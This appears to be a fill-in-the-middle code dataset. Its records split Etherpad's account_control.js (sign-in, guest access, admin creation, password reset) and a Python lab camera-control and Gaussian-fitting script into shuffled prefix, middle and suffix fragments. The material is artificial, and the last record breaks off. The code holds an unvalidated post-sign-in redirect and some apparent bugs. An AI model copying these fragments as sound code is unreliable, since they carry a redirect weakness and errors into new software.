guestName: padusers.getUserName() || ""
});
} | identifier_body |
account_control.js | /**
* Copyright 2009 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS-IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import("stringutils");
import("stringutils.*");
import("funhtml.*");
import("email.sendEmail");
import("cache_utils.syncedWithCache");
import("etherpad.helpers");
import("etherpad.utils.*");
import("etherpad.sessions.getSession");
import("etherpad.pro.pro_accounts");
import("etherpad.pro.pro_accounts.getSessionProAccount");
import("etherpad.pro.domains");
import("etherpad.pro.pro_utils");
import("etherpad.pro.pro_account_auto_signin");
import("etherpad.pro.pro_config");
import("etherpad.pad.pad_security");
import("etherpad.pad.padutils");
import("etherpad.pad.padusers");
import("etherpad.collab.collab_server");
function onRequest() {
if (!getSession().tempFormData) {
getSession().tempFormData = {};
}
return false; // path not handled here
}
//--------------------------------------------------------------------------------
// helpers
//--------------------------------------------------------------------------------
function _redirOnError(m, clearQuery) {
if (m) {
getSession().accountFormError = m;
var dest = request.url;
if (clearQuery) {
dest = request.path;
}
response.redirect(dest);
}
}
function setSigninNotice(m) {
getSession().accountSigninNotice = m;
}
function setSessionError(m) {
getSession().accountFormError = m;
}
function _topDiv(id, name) {
var m = getSession()[name];
if (m) {
delete getSession()[name];
return DIV({id: id}, m);
} else {
return '';
}
}
function _messageDiv() { return _topDiv('account-message', 'accountMessage'); }
function _errorDiv() { return _topDiv('account-error', 'accountFormError'); }
function _signinNoticeDiv() { return _topDiv('signin-notice', 'accountSigninNotice'); }
function _renderTemplate(name, data) {
data.messageDiv = _messageDiv;
data.errorDiv = _errorDiv;
data.signinNotice = _signinNoticeDiv;
data.tempFormData = getSession().tempFormData;
renderFramed('pro/account/'+name+'.ejs', data);
}
//----------------------------------------------------------------
// /ep/account/
//----------------------------------------------------------------
function render_main_get() {
_renderTemplate('my-account', {
account: getSessionProAccount(),
changePass: getSession().changePass
});
}
function render_update_info_get() {
response.redirect('/ep/account/');
}
function render_update_info_post() {
var fullName = request.params.fullName;
var email = trim(request.params.email);
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
pro_accounts.setEmail(getSessionProAccount(), email);
pro_accounts.setFullName(getSessionProAccount(), fullName);
getSession().accountMessage = "Info updated.";
response.redirect('/ep/account/');
}
function render_update_password_get() {
response.redirect('/ep/account/');
}
function render_update_password_post() {
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.setPassword(getSessionProAccount(), password);
if (getSession().changePass) {
delete getSession().changePass;
response.redirect('/');
}
getSession().accountMessage = "Password updated.";
response.redirect('/ep/account/');
}
//--------------------------------------------------------------------------------
// signin/signout
//--------------------------------------------------------------------------------
function render_sign_in_get() {
if (request.params.uid && request.params.tp) {
var m = pro_accounts.authenticateTempSignIn(Number(request.params.uid), request.params.tp);
if (m) {
getSession().accountFormError = m;
response.redirect('/ep/account/');
}
}
if (request.params.instantSigninKey) {
_attemptInstantSignin(request.params.instantSigninKey);
}
if (getSession().recentlySignedOut && getSession().accountFormError) {
delete getSession().accountFormError;
delete getSession().recentlySignedOut;
}
// Note: must check isAccountSignedIn before calling checkAutoSignin()!
if (pro_accounts.isAccountSignedIn()) {
_redirectToPostSigninDestination();
}
pro_account_auto_signin.checkAutoSignin();
var domainRecord = domains.getRequestDomainRecord();
var showGuestBox = false;
if (request.params.guest && request.params.padId) {
showGuestBox = true;
}
_renderTemplate('signin', {
domain: pro_utils.getFullProDomain(),
siteName: toHTML(pro_config.getConfig().siteName),
email: getSession().tempFormData.email || "",
password: getSession().tempFormData.password || "",
rememberMe: getSession().tempFormData.rememberMe || false,
showGuestBox: showGuestBox,
localPadId: request.params.padId
});
}
function _attemptInstantSignin(key) {
// See src/etherpad/control/global_pro_account_control.js
var email = null;
var password = null;
syncedWithCache('global_signin_passwords', function(c) {
if (c[key]) {
email = c[key].email;
password = c[key].password;
}
delete c[key];
});
getSession().tempFormData.email = email;
_redirOnError(pro_accounts.authenticateSignIn(email, password), true);
}
function render_sign_in_post() {
var email = trim(request.params.email);
var password = request.params.password;
getSession().tempFormData.email = email;
getSession().tempFormData.rememberMe = request.params.rememberMe;
_redirOnError(pro_accounts.authenticateSignIn(email, password));
pro_account_auto_signin.setAutoSigninCookie(request.params.rememberMe);
_redirectToPostSigninDestination();
}
function render_guest_sign_in_get() {
var localPadId = request.params.padId;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
pro_account_auto_signin.checkAutoSignin();
pad_security.clearKnockStatus(userId, globalPadId);
_renderTemplate('signin-guest', {
localPadId: localPadId,
errorMessage: getSession().guestAccessError,
siteName: toHTML(pro_config.getConfig().siteName),
guestName: padusers.getUserName() || ""
});
}
function render_guest_sign_in_post() {
function _err(m) {
if (m) {
getSession().guestAccessError = m;
response.redirect(request.url);
}
}
var displayName = request.params.guestDisplayName;
var localPadId = request.params.localPadId;
if (!(displayName && displayName.length > 0)) {
_err("Please enter a display name");
}
getSession().guestDisplayName = displayName;
response.redirect('/ep/account/guest-knock?padId='+encodeURIComponent(localPadId)+
"&guestDisplayName="+encodeURIComponent(displayName));
}
function render_guest_knock_get() {
var localPadId = request.params.padId;
helpers.addClientVars({
localPadId: localPadId,
guestDisplayName: request.params.guestDisplayName,
padUrl: "http://"+httpHost(request.host)+"/"+localPadId
});
_renderTemplate('guest-knock', {});
}
function render_guest_knock_post() {
var localPadId = request.params.padId;
var displayName = request.params.guestDisplayName;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
response.setContentType("text/plain; charset=utf-8");
// has the knock already been answsered?
var currentAnswer = pad_security.getKnockAnswer(userId, globalPadId);
if (currentAnswer) {
response.write(currentAnswer);
} else {
collab_server.guestKnock(globalPadId, userId, displayName);
response.write("wait");
}
}
function _redirectToPostSigninDestination() {
var cont = request.params.cont;
if (!cont) { cont = '/'; }
response.redirect(cont);
}
function render_sign_out() {
pro_account_auto_signin.setAutoSigninCookie(false);
pro_accounts.signOut();
delete getSession().padPasswordAuth;
getSession().recentlySignedOut = true;
response.redirect("/");
}
//--------------------------------------------------------------------------------
// create-admin-account (eepnet only)
//--------------------------------------------------------------------------------
function render_create_admin_account_get() {
if (pro_accounts.doesAdminExist()) {
renderFramedError("An admin account already exists on this domain.");
response.stop();
}
_renderTemplate('create-admin-account', {});
}
function render_create_admin_account_post() {
var email = trim(request.params.email);
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
var fullName = request.params.fullName; | if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.createNewAccount(null, fullName, email, password, true);
var u = pro_accounts.getAccountByEmail(email, null);
// TODO: should we send a welcome email here?
//pro_accounts.sendWelcomeEmail(u);
_redirOnError(pro_accounts.authenticateSignIn(email, password));
response.redirect("/");
}
//--------------------------------------------------------------------------------
// forgot password
//--------------------------------------------------------------------------------
function render_forgot_password_get() {
if (request.params.instantSubmit && request.params.email) {
render_forgot_password_post();
} else {
_renderTemplate('forgot-password', {
email: getSession().tempFormData.email || ""
});
}
}
function render_forgot_password_post() {
var email = trim(request.params.email);
getSession().tempFormData.email = email;
var u = pro_accounts.getAccountByEmail(email, null);
if (!u) {
_redirOnError("Account not found: "+email);
}
var tempPass = stringutils.randomString(10);
pro_accounts.setTempPassword(u, tempPass);
var subj = "EtherPad: Request to reset your password on "+request.domain;
var body = renderTemplateAsString('pro/account/forgot-password-email.ejs', {
account: u,
recoverUrl: pro_accounts.getTempSigninUrl(u, tempPass)
});
var fromAddr = pro_utils.getEmailFromAddr();
sendEmail(u.email, fromAddr, subj, {}, body);
getSession().accountMessage = "An email has been sent to "+u.email+" with instructions to reset the password.";
response.redirect(request.path);
} |
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
| random_line_split |
account_control.js | /**
* Copyright 2009 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS-IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import("stringutils");
import("stringutils.*");
import("funhtml.*");
import("email.sendEmail");
import("cache_utils.syncedWithCache");
import("etherpad.helpers");
import("etherpad.utils.*");
import("etherpad.sessions.getSession");
import("etherpad.pro.pro_accounts");
import("etherpad.pro.pro_accounts.getSessionProAccount");
import("etherpad.pro.domains");
import("etherpad.pro.pro_utils");
import("etherpad.pro.pro_account_auto_signin");
import("etherpad.pro.pro_config");
import("etherpad.pad.pad_security");
import("etherpad.pad.padutils");
import("etherpad.pad.padusers");
import("etherpad.collab.collab_server");
function onRequest() {
if (!getSession().tempFormData) {
getSession().tempFormData = {};
}
return false; // path not handled here
}
//--------------------------------------------------------------------------------
// helpers
//--------------------------------------------------------------------------------
function _redirOnError(m, clearQuery) {
if (m) {
getSession().accountFormError = m;
var dest = request.url;
if (clearQuery) {
dest = request.path;
}
response.redirect(dest);
}
}
function setSigninNotice(m) {
getSession().accountSigninNotice = m;
}
function setSessionError(m) {
getSession().accountFormError = m;
}
function _topDiv(id, name) {
var m = getSession()[name];
if (m) {
delete getSession()[name];
return DIV({id: id}, m);
} else {
return '';
}
}
function _messageDiv() { return _topDiv('account-message', 'accountMessage'); }
function _errorDiv() { return _topDiv('account-error', 'accountFormError'); }
function _signinNoticeDiv() { return _topDiv('signin-notice', 'accountSigninNotice'); }
function _renderTemplate(name, data) {
data.messageDiv = _messageDiv;
data.errorDiv = _errorDiv;
data.signinNotice = _signinNoticeDiv;
data.tempFormData = getSession().tempFormData;
renderFramed('pro/account/'+name+'.ejs', data);
}
//----------------------------------------------------------------
// /ep/account/
//----------------------------------------------------------------
function render_main_get() {
_renderTemplate('my-account', {
account: getSessionProAccount(),
changePass: getSession().changePass
});
}
function render_update_info_get() {
response.redirect('/ep/account/');
}
function render_update_info_post() {
var fullName = request.params.fullName;
var email = trim(request.params.email);
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
pro_accounts.setEmail(getSessionProAccount(), email);
pro_accounts.setFullName(getSessionProAccount(), fullName);
getSession().accountMessage = "Info updated.";
response.redirect('/ep/account/');
}
function render_update_password_get() {
response.redirect('/ep/account/');
}
function render_update_password_post() {
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.setPassword(getSessionProAccount(), password);
if (getSession().changePass) {
delete getSession().changePass;
response.redirect('/');
}
getSession().accountMessage = "Password updated.";
response.redirect('/ep/account/');
}
//--------------------------------------------------------------------------------
// signin/signout
//--------------------------------------------------------------------------------
function render_sign_in_get() {
if (request.params.uid && request.params.tp) {
var m = pro_accounts.authenticateTempSignIn(Number(request.params.uid), request.params.tp);
if (m) {
getSession().accountFormError = m;
response.redirect('/ep/account/');
}
}
if (request.params.instantSigninKey) {
_attemptInstantSignin(request.params.instantSigninKey);
}
if (getSession().recentlySignedOut && getSession().accountFormError) {
delete getSession().accountFormError;
delete getSession().recentlySignedOut;
}
// Note: must check isAccountSignedIn before calling checkAutoSignin()!
if (pro_accounts.isAccountSignedIn()) {
_redirectToPostSigninDestination();
}
pro_account_auto_signin.checkAutoSignin();
var domainRecord = domains.getRequestDomainRecord();
var showGuestBox = false;
if (request.params.guest && request.params.padId) |
_renderTemplate('signin', {
domain: pro_utils.getFullProDomain(),
siteName: toHTML(pro_config.getConfig().siteName),
email: getSession().tempFormData.email || "",
password: getSession().tempFormData.password || "",
rememberMe: getSession().tempFormData.rememberMe || false,
showGuestBox: showGuestBox,
localPadId: request.params.padId
});
}
function _attemptInstantSignin(key) {
// See src/etherpad/control/global_pro_account_control.js
var email = null;
var password = null;
syncedWithCache('global_signin_passwords', function(c) {
if (c[key]) {
email = c[key].email;
password = c[key].password;
}
delete c[key];
});
getSession().tempFormData.email = email;
_redirOnError(pro_accounts.authenticateSignIn(email, password), true);
}
function render_sign_in_post() {
var email = trim(request.params.email);
var password = request.params.password;
getSession().tempFormData.email = email;
getSession().tempFormData.rememberMe = request.params.rememberMe;
_redirOnError(pro_accounts.authenticateSignIn(email, password));
pro_account_auto_signin.setAutoSigninCookie(request.params.rememberMe);
_redirectToPostSigninDestination();
}
function render_guest_sign_in_get() {
var localPadId = request.params.padId;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
pro_account_auto_signin.checkAutoSignin();
pad_security.clearKnockStatus(userId, globalPadId);
_renderTemplate('signin-guest', {
localPadId: localPadId,
errorMessage: getSession().guestAccessError,
siteName: toHTML(pro_config.getConfig().siteName),
guestName: padusers.getUserName() || ""
});
}
function render_guest_sign_in_post() {
function _err(m) {
if (m) {
getSession().guestAccessError = m;
response.redirect(request.url);
}
}
var displayName = request.params.guestDisplayName;
var localPadId = request.params.localPadId;
if (!(displayName && displayName.length > 0)) {
_err("Please enter a display name");
}
getSession().guestDisplayName = displayName;
response.redirect('/ep/account/guest-knock?padId='+encodeURIComponent(localPadId)+
"&guestDisplayName="+encodeURIComponent(displayName));
}
function render_guest_knock_get() {
var localPadId = request.params.padId;
helpers.addClientVars({
localPadId: localPadId,
guestDisplayName: request.params.guestDisplayName,
padUrl: "http://"+httpHost(request.host)+"/"+localPadId
});
_renderTemplate('guest-knock', {});
}
function render_guest_knock_post() {
var localPadId = request.params.padId;
var displayName = request.params.guestDisplayName;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
response.setContentType("text/plain; charset=utf-8");
// has the knock already been answsered?
var currentAnswer = pad_security.getKnockAnswer(userId, globalPadId);
if (currentAnswer) {
response.write(currentAnswer);
} else {
collab_server.guestKnock(globalPadId, userId, displayName);
response.write("wait");
}
}
function _redirectToPostSigninDestination() {
var cont = request.params.cont;
if (!cont) { cont = '/'; }
response.redirect(cont);
}
function render_sign_out() {
pro_account_auto_signin.setAutoSigninCookie(false);
pro_accounts.signOut();
delete getSession().padPasswordAuth;
getSession().recentlySignedOut = true;
response.redirect("/");
}
//--------------------------------------------------------------------------------
// create-admin-account (eepnet only)
//--------------------------------------------------------------------------------
function render_create_admin_account_get() {
if (pro_accounts.doesAdminExist()) {
renderFramedError("An admin account already exists on this domain.");
response.stop();
}
_renderTemplate('create-admin-account', {});
}
function render_create_admin_account_post() {
var email = trim(request.params.email);
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
var fullName = request.params.fullName;
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.createNewAccount(null, fullName, email, password, true);
var u = pro_accounts.getAccountByEmail(email, null);
// TODO: should we send a welcome email here?
//pro_accounts.sendWelcomeEmail(u);
_redirOnError(pro_accounts.authenticateSignIn(email, password));
response.redirect("/");
}
//--------------------------------------------------------------------------------
// forgot password
//--------------------------------------------------------------------------------
function render_forgot_password_get() {
if (request.params.instantSubmit && request.params.email) {
render_forgot_password_post();
} else {
_renderTemplate('forgot-password', {
email: getSession().tempFormData.email || ""
});
}
}
function render_forgot_password_post() {
var email = trim(request.params.email);
getSession().tempFormData.email = email;
var u = pro_accounts.getAccountByEmail(email, null);
if (!u) {
_redirOnError("Account not found: "+email);
}
var tempPass = stringutils.randomString(10);
pro_accounts.setTempPassword(u, tempPass);
var subj = "EtherPad: Request to reset your password on "+request.domain;
var body = renderTemplateAsString('pro/account/forgot-password-email.ejs', {
account: u,
recoverUrl: pro_accounts.getTempSigninUrl(u, tempPass)
});
var fromAddr = pro_utils.getEmailFromAddr();
sendEmail(u.email, fromAddr, subj, {}, body);
getSession().accountMessage = "An email has been sent to "+u.email+" with instructions to reset the password.";
response.redirect(request.path);
}
| {
showGuestBox = true;
} | conditional_block |
gui_debugging.py | ## For Cam Control ##
from instrumental import instrument, u
import matplotlib.animation as animation
from matplotlib.widgets import Button, Slider
from scipy.optimize import curve_fit
## Other ##
import time
import matplotlib.pyplot as plt
import numpy as np
from math import sqrt
MAX_EXP = 150
def stabilize_intensity(which_cam, cam, verbose=False):
""" Given a UC480 camera object (instrumental module) and
a number indicating the number of trap objects,
applies an iterative image analysis to individual trap adjustment
in order to achieve a nearly homogeneous intensity profile across traps.
"""
L = 0.5 # Correction Rate
mags = np.ones(12) ### !
ntraps = len(mags)
iteration = 0
while iteration < 5:
iteration += 1
print("Iteration ", iteration)
im = cam.latest_frame()
try:
trap_powers = analyze_image(which_cam, im, ntraps, iteration, verbose)
except (AttributeError, ValueError) as e:
print("No Bueno, error occurred during image analysis:\n", e)
break
mean_power = trap_powers.mean()
rel_dif = 100 * trap_powers.std() / mean_power
print(f'Relative Power Difference: {rel_dif:.2f} %')
if rel_dif < 0.8:
|
deltaP = [mean_power - P for P in trap_powers]
dmags = [(dP / abs(dP)) * sqrt(abs(dP)) * L for dP in deltaP]
mags = np.add(mags, dmags)
print("Magnitudes: ", mags)
break
# self._update_magnitudes(mags)
_ = analyze_image(im, ntraps, verbose=verbose)
def _run_cam(which_cam, verbose=False):
names = ['ThorCam', 'ChamberCam'] # False, True
## https://instrumental-lib.readthedocs.io/en/stable/uc480-cameras.html ##
cam = instrument(names[which_cam])
## Cam Live Stream ##
cam.start_live_video(framerate=10 * u.hertz)
exp_t = cam._get_exposure()
## Create Figure ##
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
## Animation Frame ##
def animate(i):
if cam.wait_for_frame():
im = cam.latest_frame()
ax1.clear()
ax1.imshow(im)
## Button: Automatic Exposure Adjustment ##
def find_exposure(event):
fix_exposure(cam, set_exposure, verbose)
## Button: Intensity Feedback ##
def stabilize(event): # Wrapper for Intensity Feedback function.
im = cam.latest_frame()
print(analyze_image(which_cam, im, 12, 1, True))
# stabilize_intensity(which_cam, cam, verbose)
def snapshot(event):
im = cam.latest_frame()
guess_image(which_cam, im, 12)
def switch_cam(event):
nonlocal cam, which_cam
cam.close()
which_cam = not which_cam
cam = instrument(names[which_cam])
cam.start_live_video(framerate=10 * u.hertz)
# ## Button: Pause ##
# def playback(event):
# if playback.running:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_STOP)
# playback.running = 0
# else:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_START | M2CMD_CARD_ENABLETRIGGER)
# playback.running = 1
# playback.running = 1
## Slider: Exposure ##
def adjust_exposure(exp_t):
cam._set_exposure(exp_t * u.milliseconds)
## Button Construction ##
axspos = plt.axes([0.56, 0.0, 0.13, 0.05])
axstab = plt.axes([0.7, 0.0, 0.1, 0.05])
# axstop = plt.axes([0.81, 0.0, 0.12, 0.05])
axplot = plt.axes([0.81, 0.0, 0.09, 0.05]) ### !
axswch = plt.axes([0.91, 0.0, 0.09, 0.05])
axspar = plt.axes([0.14, 0.9, 0.73, 0.05])
correct_exposure = Button(axspos, 'AutoExpose')
stabilize_button = Button(axstab, 'Stabilize')
# pause_play = Button(axstop, 'Pause/Play')
plot_snapshot = Button(axplot, 'Plot')
switch_cameras = Button(axswch, 'Switch')
set_exposure = Slider(axspar, 'Exposure', valmin=0.1, valmax=MAX_EXP, valinit=exp_t.magnitude)
correct_exposure.on_clicked(find_exposure)
stabilize_button.on_clicked(stabilize)
# pause_play.on_clicked(playback)
plot_snapshot.on_clicked(snapshot)
switch_cameras.on_clicked(switch_cam)
set_exposure.on_changed(adjust_exposure)
## Begin Animation ##
_ = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
plt.close(fig)
########## Helper Functions ###############
# noinspection PyPep8Naming
def gaussian1d(x, x0, w0, A, offset):
""" Returns intensity profile of 1d gaussian beam
x0: x-offset
w0: waist of Gaussian beam
A: Amplitude
offset: Global offset
"""
if w0 == 0:
return 0
return A * np.exp(-2 * (x - x0) ** 2 / (w0 ** 2)) + offset
# noinspection PyPep8Naming
def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):
""" Returns intensity profile of trap array
x0_vec: 1-by-ntraps array of x-offsets of traps
wx_vec: 1-by-ntraps array of waists of traps
A_vec: 1-by-ntraps array of amplitudes of traps
offset: global offset
ntraps: Number of traps
"""
array = np.zeros(np.shape(x))
for k in range(ntraps):
array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)
return array + offset
def wrapper_fit_func(x, ntraps, *args):
""" Juggles parameters in order to be able to fit a list of parameters
"""
a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])
offset = args[0][-1]
return gaussianarray1d(x, a, b, c, offset, ntraps)
def guess_image(which_cam, image, ntraps):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.65]
## Image Conditioning ##
margin = 10
threshold = np.max(image)*threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif p < threshold and left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
xdata = np.arange(x_len)
plt.figure()
plt.plot(xdata, peak_vals)
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.6]
margin = 10
threshold = np.max(image) * threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
## Fitting ##
if verbose:
print("Fitting...")
xdata = np.arange(x_len)
popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),
xdata, peak_vals, p0=params0)
if verbose:
print("Fit!")
plt.figure()
plt.plot(xdata, peak_vals) # Data
if iteration:
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit
plt.title("Iteration: %d" % iteration)
else:
plt.title("Final Product")
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
print("Fig_Newton")
trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])
return trap_powers
# noinspection PyProtectedMember
def fix_exposure(cam, slider, verbose=False):
""" Given the opened camera object and the Slider
object connected to the camera's exposure,
adjusts the exposure to just below clipping.
*Binary Search*
"""
margin = 10
exp_t = MAX_EXP / 2
cam._set_exposure(exp_t * u.milliseconds)
time.sleep(0.5)
print("Fetching Frame")
im = cam.latest_frame()
x_len = len(im)
right, left = MAX_EXP, 0
inc = right / 10
for _ in range(10):
## Determine if Clipping or Low-Exposure ##
gap = 255
for i in range(x_len):
if i < margin or x_len - i < margin:
continue
else:
gap = min(255 - max(im[i]), gap)
## Make Appropriate Adjustment ##
if gap == 0:
if verbose:
print("Clipping at: ", exp_t)
right = exp_t
elif gap > 50:
if verbose:
print("Closing gap: ", gap, " w/ exposure: ", exp_t)
left = exp_t
else:
if verbose:
print("Final Exposure: ", exp_t)
return
if inc < 0.01:
exp_t -= inc if gap == 0 else -inc
else:
exp_t = (right + left) / 2
inc = (right - left) / 10
slider.set_val(exp_t)
time.sleep(1)
im = cam.latest_frame()
_run_cam(True, True) | print("WOW")
break | conditional_block |
gui_debugging.py | ## For Cam Control ##
from instrumental import instrument, u
import matplotlib.animation as animation
from matplotlib.widgets import Button, Slider
from scipy.optimize import curve_fit
## Other ##
import time
import matplotlib.pyplot as plt
import numpy as np
from math import sqrt
MAX_EXP = 150
def stabilize_intensity(which_cam, cam, verbose=False):
""" Given a UC480 camera object (instrumental module) and
a number indicating the number of trap objects,
applies an iterative image analysis to individual trap adjustment
in order to achieve a nearly homogeneous intensity profile across traps.
"""
L = 0.5 # Correction Rate
mags = np.ones(12) ### !
ntraps = len(mags)
iteration = 0
while iteration < 5:
iteration += 1
print("Iteration ", iteration)
im = cam.latest_frame()
try:
trap_powers = analyze_image(which_cam, im, ntraps, iteration, verbose)
except (AttributeError, ValueError) as e:
print("No Bueno, error occurred during image analysis:\n", e)
break
mean_power = trap_powers.mean()
rel_dif = 100 * trap_powers.std() / mean_power
print(f'Relative Power Difference: {rel_dif:.2f} %')
if rel_dif < 0.8:
print("WOW")
break
deltaP = [mean_power - P for P in trap_powers]
dmags = [(dP / abs(dP)) * sqrt(abs(dP)) * L for dP in deltaP]
mags = np.add(mags, dmags)
print("Magnitudes: ", mags)
break
# self._update_magnitudes(mags)
_ = analyze_image(im, ntraps, verbose=verbose)
def _run_cam(which_cam, verbose=False):
names = ['ThorCam', 'ChamberCam'] # False, True
## https://instrumental-lib.readthedocs.io/en/stable/uc480-cameras.html ##
cam = instrument(names[which_cam])
## Cam Live Stream ##
cam.start_live_video(framerate=10 * u.hertz)
exp_t = cam._get_exposure()
## Create Figure ##
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
## Animation Frame ##
def | (i):
if cam.wait_for_frame():
im = cam.latest_frame()
ax1.clear()
ax1.imshow(im)
## Button: Automatic Exposure Adjustment ##
def find_exposure(event):
fix_exposure(cam, set_exposure, verbose)
## Button: Intensity Feedback ##
def stabilize(event): # Wrapper for Intensity Feedback function.
im = cam.latest_frame()
print(analyze_image(which_cam, im, 12, 1, True))
# stabilize_intensity(which_cam, cam, verbose)
def snapshot(event):
im = cam.latest_frame()
guess_image(which_cam, im, 12)
def switch_cam(event):
nonlocal cam, which_cam
cam.close()
which_cam = not which_cam
cam = instrument(names[which_cam])
cam.start_live_video(framerate=10 * u.hertz)
# ## Button: Pause ##
# def playback(event):
# if playback.running:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_STOP)
# playback.running = 0
# else:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_START | M2CMD_CARD_ENABLETRIGGER)
# playback.running = 1
# playback.running = 1
## Slider: Exposure ##
def adjust_exposure(exp_t):
cam._set_exposure(exp_t * u.milliseconds)
## Button Construction ##
axspos = plt.axes([0.56, 0.0, 0.13, 0.05])
axstab = plt.axes([0.7, 0.0, 0.1, 0.05])
# axstop = plt.axes([0.81, 0.0, 0.12, 0.05])
axplot = plt.axes([0.81, 0.0, 0.09, 0.05]) ### !
axswch = plt.axes([0.91, 0.0, 0.09, 0.05])
axspar = plt.axes([0.14, 0.9, 0.73, 0.05])
correct_exposure = Button(axspos, 'AutoExpose')
stabilize_button = Button(axstab, 'Stabilize')
# pause_play = Button(axstop, 'Pause/Play')
plot_snapshot = Button(axplot, 'Plot')
switch_cameras = Button(axswch, 'Switch')
set_exposure = Slider(axspar, 'Exposure', valmin=0.1, valmax=MAX_EXP, valinit=exp_t.magnitude)
